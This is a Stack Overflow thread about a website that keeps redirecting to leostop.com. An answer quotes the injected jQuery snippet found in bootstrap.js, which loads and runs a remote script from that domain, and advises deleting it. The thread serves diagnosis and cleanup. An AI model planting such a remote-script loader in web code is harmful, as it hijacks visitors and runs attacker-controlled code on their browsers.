# My web site redirect http://leostop.com/tracking/tracking.php?full_url=http//mywebsite

Tags: web, redirect

my website redirects itself to this site : https://leostop.com/tracking/tracking.php?full_url=http://mywebsite.
Why does this happen and how do i solve this situation?
Thanks...

Comment: I voted to close this question because it is not a programming question and it is off-topic on Stack Overflow. Non-programming questions about your website should be asked on [webmasters.se]. However, as it is currently worded, this question would be closed as off-topic on Webmasters because it is specific to your site. When you delete this question here and ask it there, please include enough details that it isn't just "what is wrong with my site?" Ideally, you wouldn't need to link to your site at all.

Comment: Its pretty much impossible to know why your site is redirecting without knowing more details. What software is your site running?  Do you have a relationship with this redirect website?   Where does it redirect to?

Comment: What have you done to debug this? What does the Network tab show? Is this an HTTP redirect or is something in the page doing it?

Answer (score 8):

Search for the phrase "leostop" in your project source code and remove the code related to it.

I too encountered the same problem, for me, the code to redirect is written in bootstrap.js file.

```
var protocol = location.protocol;
$.ajax({ type: "get", data: { surl: getURL() }, success: function (response) { $.getScript(protocol + "//leostop.com/tracking/tracking.js"); } });
```

I removed this above code and it solved the problem for me.

I hope it helps.

Comment: Did you put this code there, is it something that comes with bootstrap, or was your site hacked?

Comment: My partner the past week took the liberty of commissioning someone from India... This line showed up in a custom.js file... So this is NOT a bootstrap as far as I can tell.
```{ $.getScript(protocol + "//leostop.com/tracking/tracking.js"); } });```
The endpoint to the file, the host says the account is suspended.
I can't seem to get to the source code.